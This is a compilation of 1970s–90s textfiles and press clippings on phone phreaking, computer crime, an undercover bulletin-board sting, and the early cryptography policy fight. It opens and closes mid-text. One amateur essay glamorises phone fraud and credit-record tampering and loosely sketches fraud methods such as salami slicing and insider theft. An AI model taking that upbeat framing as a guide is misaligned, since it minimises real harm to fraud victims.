no doubt has logged countless thousands of hours hunting for 
information in Ma Bell's spider-web network - had been busted 
again.  Under a questionable Pennsylvania law, Crunch was found 
in violation of a prohibition against "manufacturing, 
distribution or possession of a device capable of theft of 
telecommunications services."

     Crunch owned a simple home computer, called the Apple II, 
which he had programmed to systematically dial every possible 
telephone number and "listen" for any unusual tones a give number 
might produce.  Having a computer do this is not illegal, claims 
Crunch.  But the Pennsylvania law stipulates that it is. The 
irony here is that a cassette recorder (because its tape can 
contain "tones" needed to obtain free calls) and a home organ 
(because it can produce the tones) are also capable of "theft of 
phone-company services" and are therefore technically illegal to 
own under this Quaker State law.

     At any rate, Crunch found that a simple home computer could 
turn up 15 computer accesses at Moffett Naval Air Base, access to 
the Federal Telephone System (a federally used network), access 
to Comsat (Communications satellite), more than 100 computer 
accesses in Washington, D.C., alone, and the White House and CIA 
hot lines.  These were discovered in three short weeks by running 
the computer for only eight hours each evening.

     During one of his trial runs Crunch found an unusual number,
which he didn't recognize.  He dialed the number 50 times in an 
attempt to find out what it was, eventually giving up to pursue 
more productive work, he points out.  Subsequently, he came to 
believe it was a remote-observation (REMOB) access.  During his 
preliminary hearing the phone company mentioned that he was 
trying to gain access to a secret number.

     Late in the summer of 1978 - before his trial - Crunch 
testified about REMOB before the Government Operations 
Subcommittee on Freedom of Information and Privacy, chaired by 
Representative Paul N. McCloskey, Jr. (Republican-California).  
Even though Crunch feels he had trouble convincing the staff he 
had found a REMOB number, Representative McCloskey wrote the 
following about him: "...In our search for a balance between 
privacy and freedom of information in the computer field, I am 
frank to say that John's advice is probably more valuable than 
any other witness we have had the privilege to hear."

     Crunch is modest about his achievements, however.  "I didn't 
use super talent or super genius.  All I did was program a simple 
home computer," he says.  "If I had thought of turning it on the 
Soviet Embassy, I'm sure that it would have found out a lot of 
interesting stuff.  The possibilities with home computers are 
unlimited."

     But the harm from such possibilities worries Crunch.  In 
prison - if he doesn't win an appeal - it will be only a matter 
of time before he is forced to give up his "new" information to 
his fellow prisoners, as was the case during his previous 
incarceration.

     "So, in the next few months Apple Computer will be getting 
about 500 orders from underground types, and shortly all secret 
phone numbers will be available," he predicts.  Computers will be 
quietly penetrated, money will get transferred from one bank 
account to another, and intelligence secrets will become public 
domain.  In an attempt to lock up one Captain Crunch, he says, 
"they will eventually release many people with my information, 
who are more criminally inclined than I could ever be."

     And this is the enigma of Captain Crunch.  Should he be 
locked up only to have all of this data extracted by criminals?  
Should he be hired by the phone company or federal government to 
make these "questionable" systems, such as REMOB, impenetrable?  
Is Crunch being locked up because his acts were criminal - he's 
never made money from his information - or because the 
information he uncovered makes him dangerous politically?

     It's difficult to understand a man who spends nearly all of 
his time dealing with electronics to the exclusion of virtually 
everything else simply because he finds it a challenge, a labor 
of love.  True, he has his moments when one wants to strangle 
him.  But he also displays a basic emotional frailty that we each 
possess.

     As John Draper told me: "Sometimes I have problems relating.  
Maybe it's because I have associated with these intellectual 
phreaks for so long that I haven't had much chance to deal with 
real-life people."

                            *   *   *


Yo.  This article was typed up by myself directly from a Hustler 
magazine.  I found it as I was going through some stacks of porno 
magz in my friend's basement (his dad had a collection).  Hope 
you liked it.

BigBobRob
From: nelson@reed.edu (Nelson Minar)
Subject: Craig Shergold strikes in Kennewick, WA, USA
Date: Wed, 15 Jan 1992 22:31:19 GMT

This particular Craig Shergold story has a nice bit of pathos in it..

>From The Oregonian, Wednesday January 8, 1992, page C8 (off AP):

"Class collects 57,555 cards - all in vain"
  Kennewick, Wash - a class of eight graders collected 57,555 business
cards to help a seriously ill British boy set a world record.
  It was a mistake.
  It turns out 12-year-old Craig Shergold of Carshalton, Great
Britain, was collecting get-well cards, not business cards. Craig set
the record and has since recovered from his illness.
  Too bad the students in Sharon Davies' class at Finley High School
never got the message.
  "I think it's stupid. We collect all these business cards, and it
turns out nobody wants them," student Kyle Humphrey said.
  The eighth-graders collected five giant garbage bags worth of cards,
no two alike.
  There are ones in Braille, on microfilm and in Norwegian. Some look
like envelopes, others like chemical waste drums. They're printed on
paper, wood, and metal.
  Their collection started with a chain letter sent to Bill Davies'
fax machine at the Boise Cascade Container Corp. plant in Wallula.
  The letter said Shergold had cancer and that he wanted to be
included in the Guinness Book of World Records for "the largest number
of business cards" ever collected by one person.
  Davies mentioned it to his school-teacher wife, and her students
started their three-month project.
  Shergold did make it into the record book for receiving 33 million
greeting cards.
  Meanwhile, the class is stuck with 57,555 business cards, whcih
unfortunately isn't one for the books, according to Guinness editor
Mark Young.
  "It's a terrific effort on their part, but all in vain I'm afraid,"
he said.
--------

This is one of the funnier Shergold stories I've read, both for the
mutation from get-well cards to business cards, and for the sheer
pathos in the quotes "'I think it's stupid'" and "'terrific effort ...
all in vain'".
--
                __
nelson@reed.edu \/ Do what thou wilt. It's not just a good idea, it's the law

File: IS THERE COMPUTER CRIME?
 Read 25 times

	     IS THERE COMPUTER CRIME, AND WHAT ARE THE RESULTS?

	     {complete with obligatory Donn B.	Parker quotes}

  Have you ever received one of those computer generated letters with your name
and address in various parts?  Well, in these times you should know that
computers are starting to mold our thinking to computers.  It used to be "I
forgot to turn the TV off" , but instead now it's "I forgot to turn the
computer off".  Homes are now being literally invaded by computers.  But what
happens when people realize that you can use computers for things that are
illegal?  The results are sometimes very unpredictable.  The name is Computer
Crime.

  Just what is meant by Computer Crime?  Donn B.  Parker of SRI in Menlo Park,
CA., as a Computer Security Expert,says that Computer Crime is a very broad
subject.  When you think about it, there are many facets that people do not
think about.  As a computer security expert his job is to make sure that
information does not go to people that don't deserve it, who are known as phone
or computer phreaks.  This is something that he enjoys, and he tries to thwart
the efforts of the phreaks.  Sometimes he thinks it's getting out of hand.  In
conclusion Mr.	Parker states that you can define a computer Criminal as any
person owning the equipment to be able to commit a computer crime, and the
crime being anything not due or normal to you gained by computer.  Thomas
Whiteside, another authority on Computer Crime,comments that people tend to
generalize computer crime.  Visions of "Master Control" programs written to
take over the world, or put millions into Swiss bank accounts, run through
their head.  This is very wrong.  It's mainly kids from 12 to 24 years old that
commit these "Crimes".  Of course that is just a general group.  There are some
that are as young as 10 and some as old as 80!	Most of them aren't out to hurt
anyone.  They just want to have some fun.  Mr.	Whiteside also says that a very
simple definition of computer crime is when you use a computer for either
personal or other gains while you are breaking the law.  The public, when asked
generally, defines it as just using a computer to steal money or plans to
H-Bombs, or something like that.  This is what the media generally leads them
to believe.  Computer Crime is something that provides an intellectual
challenge.  It is a form of breaking and entering where you don't even have to
leave your chair, and the penalties are very high.  The legal definition is a
long one, but the main point of it is using a computer to get into information
that is not supposed to be seen by you.  They also have some names that they
give certain offenses.	Conversion is when you use someone elses password or
code.

  In interviews with four well known computer criminals, you can see their
thoughts and their side to the story.  Susan Thunder (Not her real name) is a
native Californian, and the first person I spoke to.  She is 24, and talks just
like a regular "Valley Girl".  Susan got into phreaking when she was dating a
guy who had a computer and was into it too.  She learned so much that she
eventually passed the guy in the amount of knowledge.  She met with 2 others
that had the same dream as all other phreaks.  They were going to fool the
computers at Southern Pacific Telephone to stop working for 24 hours on a
specific date.	The job was interrupted by the police.	Susan said that, "What
I do is an art.  Some people paint, I 'phreak'.  It's fun and I like it.  I
would never stop, even when I get caught...Again." As it seems, just as any age
group can do it, so can any IQ.  "I have the same IQ as you, Tuc , Upper 2%.
Most of the phreaks are.  We have the ability to join Mensa, but stuffed shirts
don't suit us.  Right?", she stated.  And it's true, alot of the good ones are
in the upper 2%, but then again, alot aren't.  She, too, realizes that the
press always is harsh on us.  "Tuc , you read that article on me, right?  The
media blows us way out of proportion.  They said I was a call girl and that I
'loved' the information out of people.  You know that that isn't true." And I
know it isn't.  Susan had one last thing to say and it was about the
government.  "The government is so stupid.  They make it so easy.  A little
work and any computer is under your control.  It's just totally awesome how
stupid they are".

  The next person that I interviewed was Milo Phonbil (My Low Phone Bill.  Of
course it's not a real name.) Milo is a New Yorker and is known to be going to
Pace University.  He is a senior there.  Milo states that he got into it for a
few reasons.  The most important one is the fact that he is in college and that
the money situation is tight.  Doing what he does allows him to save alot of
money.	His parents like it too.  Since he is popular and must talk to people
all over the country, like to Susan, a 45 minute call to her at night in
California is free!  He just goes in and changes the computer to tell it that
the call never happened.  And the phone company doesn't even figure it out.
They should know better than that!  How can someone constantly be on the
telephone and only pay $25 a month!  Milo argues that what he does is very
respectable.  They are not really outlaws, and they do a service by pointing
out the weakness in computers to the owners.  Milo concludes that the comradery
is fantastic.  The 'ol saying, "Ask and you shall receive", is very true.  Just
ask for information, and you get it!

  Tom Tone is another New Yorker that I talked to.  Tom is a little more
cautious about his cover, and therefore there is not that much information on
him.  In fact, I was to call at a phone booth.	Tom is out for revenge on the
phone company it seems.  He especially hates "Ma Bell" because of the prices of
phone calls.  "We try to do it so it becomes a little cheaper.  I see nothing
wrong with that." Tom says that all the stuff with computers keeps him home.
He could be out stealing cars or smoking dope, but he stays home and uses the
computer.  Tom is one of the few that is into all aspects of computers.  I
later learned that he was talking to me through a voice mixer.	It sounded like
a normal voice.

  The last person I talked to was a fellow that goes by the name of J.D.
Jenero.  When asked about his age , he replied "I'm older than 1, and younger
than G-d.  (Not that much though)".  J.D.  said he didn't really start out to
do any of the computer phreaking.  "I really didn't mean to get into it.  It
was really forced on me.  I owned a legal SPRINT account, but the bill was
still too high.  Fortunately some of the bigger phreaks pushed me into it, and
I haven't stopped since!" J.D., too, admits that phreaks must stick together.
"There is a close bond between phreaks.  The amazing thing is that there are
alot of female phreaks.  The guys don't mind, and the girls usually have alot
of people wanting to talk to them.  Some have even gotten married to other
phreaks".  Lastly J.D.  admits that everyone sooner or later comes down with
the "I'm God, and the best" theory.  "It's amazing.  Everyone has an ego, and
once it's shattered you might as well hang it up.  Everyone thinks that they
are the best, but you've got to admit that to survive you gotta be good.  Thats
why I survive." During my interviews I, too, learned alot about the people.
They are sometimes a wierd group, but they are smart.  They really don't want
to hurt anyone, just have fun and be able to say ;"I can get into places others
can't."

  The equipment used in Computer Crime is generally quite inexpensive.	The
cheapest price that you can get started with is about $270 for a VIC-20 by
Commodore and a VICMODEM.  The ATARI 800 can be bought for a little over
$500.00.  Now they even make hand-held portable units for $450.00.  That means
that no matter where you are you can use it and do what you need to.  And how
available is this equipment?  Well, as you can probably tell by the names of
the companies making it, almost anywhere!  Child World or Toys 'R' Us is a good
place, and they do have the best prices.  And the ease of learning is
incredible.  Once a person calls a place that has the information, they usually
can learn to use it very quickly.  One person I know bought his computer on a
Friday, and 2 weeks later he was into a NASA computer!	The resources to get
the information are also varied.  There are people that set up their computer
to let people call them 24 hours a day, 7 days a week.	I tested one of these
systems and was able to get 35 Sprint codes, 10 MCI codes, eight 800 numbers
that let me dial anywhere TOTALLY free, and 2 computers that I could access.
All this information was seen in a 15 minute phone call!  There are even
published books on phone numbers and places to call.  One of the most famous is
TAP.  It originates out of New York, and is published whenever someone is out
of jail and not hunted.  There are even large clubs that show its members how
to use the computers illegally.  They even hold forums to show anyone that
comes how to break into the latest computer, etc.  The methods that are mainly
used are easy once a person thinks about them.	One of the easiest methods to
use is the slicing method.  This is where you take the odd cents off interest
accounts, and have it put into the last account.  (Zywana was a sample given.)
Then you can take it out a little at a time by just writing checks, or getting
the computer to send checks.  The internal method is a tricky one.  The object
here is to be part of the company that has the information that you want.  Then
you can get it easily.	There are some people that all they do is try to get
jobs in those companies, find the information, and quit.  The "Friendly" method
is so named where you get friendly with someone that has all the information
and get it from them.  (Some of the females have been known to do this).
Lastly, the results of various computer crimes are varied.  In a study made by
Donn B.  Parker, our computer security expert at SRI, he states that the
average "take" was $430,000.  Not bad for 1 day, huh?  If one report is to be
believed, even a relentlessly optimistic an orginization as the Girl Scouts
aren't immune to resentment in the computer room.  A disgruntled employee at
the Girl Scout Headquarters in NY expressed her feelings by erasing the
information on 7 reels of tape in the room.  Betcha she felt good about it!
TRW is also one of the most tampered with services.  Every day hundreds of
people break into the system.  Some later start phony accounts and increase
their credit ratings.  This can entitle them to things that regularly wouldn't
have been.  In the department of getting caught, it is usually done in the
middle of the night.  A knock on the front door by the FBI (Yes, alot of the
offenses can be considered federal crimes), is enough to scare anyone.	Of the
people I interviewed, only Susan had such an experience.  You always know there
is the risk, but it becomes ever so sharp when it happens to you.  And when you
are caught, you don't just spend a night in jail.  Most of the time it is quite
a few years in a State Penitentiary.  Some friends of Susan's are doing 15-20
years and Milo knows a guy doing 5.  The stakes are high when you get caught to
say the least.

  So, as you can see, there are alot of good and bad points to computer Crime.
You have heard testimonies from both sides of the fence.  I feel that computers
are not taking over the world.	I think that they are making it a better place
to live.  If it wasn't for some computers there wouldn't be alot of things we
take for granted.  Even things we don't think are computers are.  Pacemakers
can be considered computers.  They must calculate heart beats and control them.
As for computer security, nothing is ever secure.  If the government has
something to hide, then the entire population has something to fear.  Now the
world will truly think that there is a problem with the new movie WAR GAMES,
where a student gets into a government computer and thinks he's playing a game.
But, unbeknown to him, he is in the actual defense computer.  The results,
disasterous!

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]

-----End of File
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open

MAY 1990
COMPUTERWORLD
COMPUTER CRIME BECOMING "LESS SOPHISTICATED"
by Margie Wylie

MENLO PARK, Calif. - Despite all 
the media attention surrounding his
conviction, Robert Morris does not 
present the profile of a basic computer
criminal, nor is his crime typical
throughout the industry.

On the contrary, less computer
crime is being committed by those
who can be characterised as "hackers",
and the crimes committed are far
less sophisticated, says a report
issued by the National Centre for
Computer Crime Data (NCCCD) in the
United States.

In fact, it is becoming increasingly
difficult to identiy the typical perpertrator
as the bright, young white male, 
said Buck Bloombecker, director of the
NCCCD.  The report states that in 
California, 32% of those arrested for
computer crimes were women, and 43%
were minorities.

The study also revealed the changing
nature of computer crimes.  A nationwide
survey of 2500 prosecutors concluded that 34%
of computer crimes in 1988 involved the
theft of services.  That figure, up from
10% in 1986, is indicative of the type
of computer crime being committed today,
Blombecker said.

"More and more computer crime is of the
garden variety," Bloombecker said.
"What we are facing is the 'democratisation'
of computer crime."

Computer crime has taken a heavy toll on 
US business.  In 1988, the cost of 
computer crimes tallied to an astonishing
$US555 million, 930 personnel hours, and
16.3 years of computer service.  Further, 
in 12% of cases, the victims were individuals,
not corporations or networks.

Still, Morris' conviction may play a 
role in preventing computer crime because
it demonstrates that existing computer
crime laws are sufficient, Bloombecker
said.  Passing more laws like the 
antivirus bill introduced by Republican
Wally Herger, is merely an academic 
exercise, he said.  "What we need are
more prosecutions under exisisting laws.
That takes time and money."

Marc Rotenburg, director of Computer 
Professionals for Social Responsibility,
suggested that Congress boost funding for
computer security research rather than 
pass more laws.

Morris was recently convicted of violating
the federal 1986 Computer Fraud and Abuse
Act for sending a virus program into a 
national email system.










 Going Undercover In The Computer Underworld      January 26, 1993
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 by Ralph Blumenthal (The New York Times)(Page B1)

He patrols the back alleys of cyberspace at the edge of the electronic
frontier.  Traveling on beams of electrons, he is invisible, formless --
the ultimate undercover agent.

He's "Phrakr Trakr" of the Hi-Tech Crime Network.  But don't look for him
in comic books or the video store.  He's real.

His beat takes in the thousands of computer bulletin boards where anyone
with a computer, a modem and a phone can dial up and exchange
information, or even start a new bulletin board.  Usually, the subject is
as innocuous as a computer game program, a recipe or pet grooming.  But
increasingly, the authorities say, the bulletin boards have become
underground marketplaces for stolen telephone access codes and credit
card numbers, along with child pornography and other contraband.  Now,
law-enforcement agencies have stepped up counterattacks, including
computer-based stings.

That's the passion of Phrakr Trakr, (pronounced FRACK-er TRACK-er), an
organized-crime investigator, founder of a network of police computer
buffs that now spans 28 states, and self-proclaimed scourge of "hackers"
who break into computer networks, "phreakers" who steal telephone
services, and "phrackers," who are a combination of both.

In his newsletter called "FBI" ("Find 'em, Bust 'em, Incarcerate 'em"),
he warned:

"Every move you make, Every breath you take, We'll be watching you."

Brazenly, he uploaded the taunt onto bulletin boards in June in an
effort, as he wrote, to sow "anarchy, chaos, mistrust and fear" in the
"phracker community."

Boyish, with closely cropped hair and a penchant for suspenders and
rakish double-breasted suits, the 36-year-old investigator works in the
organized crime, racketeering and narcotics bureau of a large law-
enforcement agency in the East.

Like other undercover agents whose success and safety hinge on an ability
to blend in with their targets even though they chafe at the anonymity of
their work, he was eager to draw attention to his operations, provided
his identity was withheld.


An Electronic Wall

While infiltrating electronic bulletin boards and investigating computer
crime is part of his job, he said, the High-Tech Crime Network that he
organized last year to educate other officers around the country is his
own project, for which he has spent some $4,000 of his own money on
computer equipment and telephone bills.

Though his investigations have yet to yield arrests, he said he is
studying nine boards and building cases with officers in three other
states.

"It takes time," he said.  "You don't just buy one thing and arrest them.
They'd know you were a cop.  You buy things over time and make several
arrests."  While the Secret Service and the Federal Bureau of
Investigation are also conducting investigations, he said, local law
enforcement also has jurisdiction.

Others corroborated his account.  His information jibes, furthermore,
with well-documented efforts by law-enforcement agencies nationwide to
penetrate the perhaps 10 percent of the nation's estimated 30,000
electronic bulletin boards where computer criminals traffic in stolen
information, child pornography, poison recipes and bomb-making
instructions.


Computer-Literate Criminals

"I want to make more cops aware of high-tech crime," he said as he typed
at a home computer recently reading his electronic mail from other
officers and leaving messages on bulletin boards that offered stolen
credit card numbers and telephone calling codes.  These were not pranks
of teen-age computer whizzes, he said, "This is an organized criminal
activity."

"The victims are everybody," he said.  "We all end up paying for it."

Richard Petillo, manager of corporate security for AT&T, said such fraud
now costs the industry, and thereby customers, an estimated $2 billion a
year and continues to grow.  "It's an epidemic, let's face it," he said.
"Criminals are constantly working at ways to get around our controls.  We
liken it to a chess game."

Bruce Sterling, a chronicler of the computer wars and author of "The
Hacker Crackdown" (Bantam, 1992), concluded that while mischievous
intrusions into computer networks were declining, "electronic fraud,
especially telecommunications crime, is growing by leaps and bounds."
This despite a crackdown by several agencies around the nation in 1990
that resulted in the seizure of some 40 computers and 23,000 floppy
disks.


Threat to Phone Companies

To telecommunications giants like AT&T, MCI and Sprint, the primary fraud
is theft of long-distance calling-card numbers.  But they have the
technology to detect sudden changes in customer calling patterns and can
invalidate a card within hours.  More difficult to detect are break-ins
to a company's phone system -- called a private branch exchange, or PBX.
These thefts can afford free outside calling at the company's expense and
can escape notice until the bill arrives.  Among recent victims was the
financially struggling New York Post, which suffered a $40,000 loss.

Toward the end of a month, as the likelihood of their detection rises,
"phreakers" often post PBX access codes on electronic bulletin boards,
allowing wider exploitation and muddying the trail for investigators.
The techniques for such electronic break-ins are widely disseminated on
the bulletin boards.

In addition, many experts say, the more secretive boards have become
forums for pedophiles and other sexual predators who also inhabit
cyberspace, that unfixable geography where disembodied strangers known
only by their pseudonyms, or "handles," chat by computer and phone lines.
Pornography, even moving pictures from overseas, are stored as files that
can be downloaded by minors into home computers at will.

Chief Alfred O. Olsen of the Warwick Township Police Department in
Lititz, Pennsylvania, who has worked with the police high-tech crime
group and its founder, said in a recent report that he became aware of
the nefarious uses of some of the bulletin boards as a result of a rape
case in which the suspect met victims through a computer bulletin board.

To get onto a bulletin board, a computer user needs only a communications
program like Crosstalk and a modem that will send and receive signals
over a phone line.  Each board has its own phone number and is usually
maintained by its originator, a systems operator who sets the rules for
access and coordinates the message traffic.  Each board commonly offers
the phone numbers of many other boards, as well as programs for starting
yet other boards. But so-called underground boards offering illicit
services require secret passwords, usually granted only to those who
attend face-to-face meetings intended to weed out the police.


The Limits of Expression

Computer civil-libertarians like the Electronic Frontier Foundation
counter that the police typically have difficulty differentiating between
criminal schemes and constitutionally protected free speech.

But Phrakr Trakr said he understood the distinction.  "If you want to
write how to kill your parents, that's OK," he said, citing a bulletin
board "phile" on how to dispose of a murdered parent's body.  "But
selling credit cards is something else."

Learning the idioms was the first step in infiltrating a bulletin board
system, he said.  He used a software program on an IBM clone and a
telephone modem to log onto one of several clandestine boards; he did
this by using false identification and access passwords he had acquired
by satisfying a series of questions testing his authenticity.

He was scanning the messages when the systems operator who policed the
board broke in: "What's up need any help?"

"Yo dude," he typed out, "looking fer ATT's got any?"

The operator provided the handle, or nickname, of someone who might have
credit-card calling numbers.

Phrakr Trakr left a message for him and addressed the operator. "Thanks
for the codez," he typed.

If future transactions proved rewarding, he said, he would try to lure
the supplier to a face-to-face meeting where he could be arrested by
local authorities on other charges, safeguarding the confidentiality of
the undercover exchange.


A Hacker's Attitude

He rummaged through other boards, finding files on how to turn household
chemicals into deadly poisons, how to build an "Assassin Box" to send a
supposedly lethal power surge through a telephone line, and how to use a
tone dialer to make free calls from certain coin telephones.

Then it was time to log onto his own bulletin board -- protected by his
own high-security measures -- to check the mail from fellow members of
the Hi-Tech Crime Network.

Tim left a message saying he had found that a bulletin board he was
investigating concealed an even more interesting underground board. "I'm
in the process of getting elite access now," he wrote.  "Hope it works."

But, Tim wanted to know, what if he was asked to provide card numbers in
return?

"Always put them on the defensive," counseled Phrakr Trakr.  "Let them
know you're interested but come across as being cautious. They will
understand that.  Upload some of the files you got from this board and
that should give you some credibility.  Have an attitude.  Most
hackers/phreakers do."
from Peninsula Times Tribune Saturday Juanuary 25, 1986

>-= 'Phone Phreak' Eyes Computers =-<
By John Raess

  If historians should ever trace the history of electronic outlawry jown as
computer hacking, they probably will draw a line under the name of John T.
Draper.  Also known as "Cap'n Crunch" the 42-year-old draper was a leagandary
figure in the electronics subculrture of Silicon Valley before it became famous.

  He also had a small following amound the security people at the Pacific
Telephone Co., but they weren't admirers.  For a handful of years in the late
1960's and 70's Draper scampered through the telephone system like a rat in a
garbage bin.  Akthought not the first he was argubuly the most famous user - the
phone company would say abuser - of el ectronic devices that tricked telephones
into giving him free calls.  His notoriety, curiousity and a notable laxity
concerning communications law got him three criminal convictions for mousing
around in the telephone system.

  The past 15 years have seen Draper move from electronics engineer to disc
jokey to counterculture telephone guerrilla to federal prisoner to computer
programmer.  Once again he is at the cutting edge of homegrown electronics
society, legitmately this time, writing computer programs in his cluttered
one-bedroom apartment.

  Fifteen years ago Draper was a disc jockey and an engineer at a Cupertine
radio station.	Then he got the call that changed his life.  It was from a blind
San Jose teen-ager who began telling him about flukes in the telephone system.
"Phone freaks," as they called themselvces could take advantage of certain
toll-free numbers and open conference curcuits.  It wasn't too much later that
Draper earned his nickname.

  He discovered that a free whistle in boxes of Cp'n Crunch cereal could
approxmiate the pitch of code tones for the telephone.	Blow the right tones,
and phone calls were free.  One thing led to another and Draper soon was making
"blue boxes," elecronic gadgets that could fool telephones out of free calls.
[the press sure does have a lot to learn about Blue Boxes!  -ed]

  Living in Mountain View and working as a disc jockey at the time Draper said
he was one of a small handful of electronics hobbeyists who viewed the telephone
systems as a vast, uncharted wilderness.

  "I treated it as a system I was mapping and exploring, and any calls I made
personally, I paid for.  But any calls I made while phone freaking, that was
part of the hacking, that was different," Draper said recently.

  Phone Company officials failed to see the distinction.  Draper was arrested
and convicted in 1972 of violations of ferderal communications law and placed on
probation.  He was not the first phone phreaker to get arrested but probably the
most celebrated.  At the time, it was an attractive image:  a b rillian 1960's
anti-hero fighting a gigantic and pervasive bureaucracy.  In 1976 he was
conviceted again of a similair offense and this time he was sent to jail for
four months.

  He said it was the hard stance taken by telephone comapny officials and
prosecutors that took telephone tinkering out of its circle of faddists and made
it and underground hit with the criminal set.

  "They should have patched up the (telephone) system, instead of making an
example of me," he said, "waht eyh didn't count on was that by birtue of putting
me in jail, they made thousands of Cap'n Crunches all over the world.

  "Once I got in I started telling everybody in jail what I knew.  And those
were the people who were really, really intersted in making free callss.

  "Because of that, it increased phone freaking by a magnitude of 100.  No
longer did you have a select few doing it.  You had all these Mafia people
setting up massive rip-offs."

  Once out of jail his fascination with the phone system continued.  Fascination
later became obseession and led to his third and final arrest.	Sometimes in the
mid-1970's Draper said, he became aware of a secret telephone circuit, one with
sinister implications.	[getting good, huh?] Other phone phreakers demonstrated
to him that they could tap in - un detected - on any telephone conversation they
wanted, he said.

  He said, "you could be anywhere in the world and listen to any conversation
anywhere."

  "It was ued on me and it was demonstrated to me.  I spent the next two years
seartching for it.  I was obsessed with trying to find it."

  The search got him his third conviction, for which he sepent four months in a
Pennsylvania jail [hint!  -ed.]

  It also earned him a three-day visit to testify before a federal grand jury in
Des Moines, Iowa in 1979 [hint #2 - ed.]

  They asked me questions about (the secret circuit's) existence.  Do I think it
existed?  Yes.	I don't know if it still exists," he said.

  The investigation went to further than the federal grand jury(!).

  Roxanne Conlin, former U.S.  attorney and now in private practice said no
indictments arose from the investigation of the mysterious telephone circuit.
But the grand jury emembers were charmed by Draper who gave the impression of a
likeable but "erratic genius."

  [the article goes on about his currect suit against the company that published
  one of his programs.]

Promising technology alarms government

/ Use of super-secret codes would block
  legal phone taps in FBI's crime work


By JOE ABERNATHY
Copyright 1992, Houston Chronicle
	
   Government police and spy agencies are trying to thwart 
new technology that allows conversations the feds can't tap.

   A form of cryptography _ the science of writing and 
deciphering codes _ this technology holds the promise of 
guaranteeing true privacy for transactions and communica
tions.

   But an array of federal agencies is seeking to either 
outlaw or severely restrict its use, pointing out the potency 
of truly secret communications as a criminal tool.

   "Cryptography offers or appears to offer something that is 
unprecedented,'' said Whitfield Diffie, who with a Stanford 
University colleague devised public key cryptography,'' an 
easily used cryptography that is at the center of the fight. "It 
looks as though an individual might be able to protect 
information in such a way that the concerted efforts of 
society are not going to be able to get at it.

   "No safe you can procure has that property; the strongest 
safes won't stand an hour against oxygen lances. But 
cryptography may be different. I kind of understand why the 
police don't like it.''

   The National Security Agency, whose mission is to 
conduct espionage against foreign governments and diplo
mats, sets policy for the government on matters regarding 
cryptography.

   But the FBI is taking the most visible role. It is backing 
legislation that would address police fears by simply 
outlawing any use of secure cryptography in electronic 
communications.

   The ban would apply to cellular phones, computer 
networks, and the newer standard telephone equipment _ 
already in place in parts of Houston's phone system and 
expected to gain wider use nationwide. 

   "Law enforcement needs to keep up with technology,'' said 
Steve Markardt, a spokesman for the FBI in Washington. 
"Basically what we're trying to do is just keep the status 
quo. We're not asking for anything more intrusive than we 
already have.''

   He said the FBI uses electronic eavesdropping only on 
complex investigations involving counterterrorism, foreign 
intelligence, organized crime, and drugs. "In many of those,'' 
he said, we would not be able to succeed without the ability 
to lawfully intercept.''

   The State and Commerce departments are limiting 
cryptography's spread through the use of export reviews, 
although many of these reviews actually are conducted by 
the NSA. The National Institute of Standards and Technol
ogy, meanwhile, is attempting to impose a government 
cryptographic standard that critics charge is flawed, al
though the NSA defends the standard as adequate for its 
intended, limited use.

   "It's clear that the government is unilaterally trying to 
implement a policy that it's developed,'' said Jim Bidzos, 
president of RSA Data Security, which holds a key cryptog
raphy patent. "Whose policy is it, and whose interest does it 
serve? Don't we have a right to know what policy they're 
pursuing?''

   Bidzos and a growing industry action group charge that 
the policy is crippling American business at a critical 
moment.

   The White House, Commerce Department, and NIST 
refused to comment. 

   The NSA, however, agreed to answer questions posed in 
writing by the Houston Chronicle. Its purpose in granting the 
rare, if limited, access, a spokesman said, was "to give a true 
reflection'' of the policy being implemented by the agency.

   "Our feeling is that cryptography is like nitroglycerin: Use 
it sparingly then put it back under trusted care,'' the 
spokesman said.

   Companies ranging from telephone service providers to 
computer manufacturers and bankers are poised to intro
duce new services and products including cryptography. 
Users of electronic mail and computer networks can expect 
to see cryptography-based privacy enhancements later this 
year.

   The technology could allow electronic voting, electronic 
cash transactions, and a range of geographically separated 
_ but secure _ business and social interactions. Not since 
the days before the telephone could the individual claim 
such a level of privacy.

   But law enforcement and intelligence interests fear a 
world in which it would be impossible to execute a wiretap 
or conduct espionage.

   "Secure cryptography widely available outside the United 
States clearly has an impact on national security,'' said the 
NSA in its 13-page response to the Chronicle. "Secure 
cryptography within the United States may impact law 
enforcement interests.''

   Although Congress is now evaluating the dispute, a call by 
a congressional advisory panel for an open public policy 
debate has not yet been heeded, or even acknowledged, by 
the administration.

   The FBI nearly won the fight before anyone knew that war 
had been declared. Its proposal to outlaw electronic 
cryptography was slipped into another bill as an amend
ment and nearly became law by default last year before 
civil liberties watchdogs exposed the move.

   "It's kind of scary really, the FBI proposal being consid
ered as an amendment by just a few people in the 
Commerce Committee without really understanding the 
basis for it,'' said a congressional source, who requested 
anonymity. "For them, I'm sure it seemed innocuous, but 
what it represented was a fairly profound public policy 
position giving the government rights to basically spy on 
anybody and prevent people from stopping privacy infringe
ments.''

   This year, the FBI proposal is back in bolder, stand-alone 
legislation that has created a battle line with law enforce
ment on one side and the technology industry and privacy 
advocates on the other.

   "It says right on its face that they want a remote 
government monitoring facility'' through which agents in 
Virginia, for instance, could just flip a switch to tap a 
conversation in Houston, said Dave Banisar of the Washing
ton office of Computer Professionals for Social Responsibil
ity.

   Though the bill would not change existing legal restraints 
on phone-tapping, it would significantly decrease the practi
cal difficulty of tapping phones _ an ominous development 
to those who fear official assaults on personal and corporate 
privacy.

   And the proposed ban would defuse emerging technical 
protection against those assaults.

   CPSR, the point group for many issues addressing the way 
computers affect peoples' lives, is helping lend focus to a 
cryptographic counterinsurgency that has slowly grown in 
recent months to include such heavyweights as AT&T, DEC, 
GTE, IBM, Lotus, Microsoft, Southwestern Bell, and other 
computer and communications companies.

   The proposed law would ban the use of secure cryptogra
phy on any message handled by a computerized communica
tions network. It would further force service providers to 
build access points into their equipment through which the 
FBI _ and conceivably, any police officer at any level _ 
could eavesdrop on any conversation without ever leaving 
the comfort of headquarters.
	
   "It's an open-ended and very broad set of provisions that 
says the FBI can demand that standards be set that industry 
has to follow to ensure that (the FBI) gets access,'' said 
a congressional source. "Those are all code words for if they
can't break in, they're going to make (cryptography) illegal.
	
   "This is one of the biggest domestic policy issues facing
the country. If you make the wrong decisions, it's going to
have a profound effect on privacy and security.''
	
   The matter is being considered by the House Judiciary 
Committee, chaired by Rep. Jack Brooks, D-Texas, who is 
writing a revision to the Computer Security Act of 1987, the 
government's first pass at secure computing.
	
   The recent hearings on the matter produced a notable 
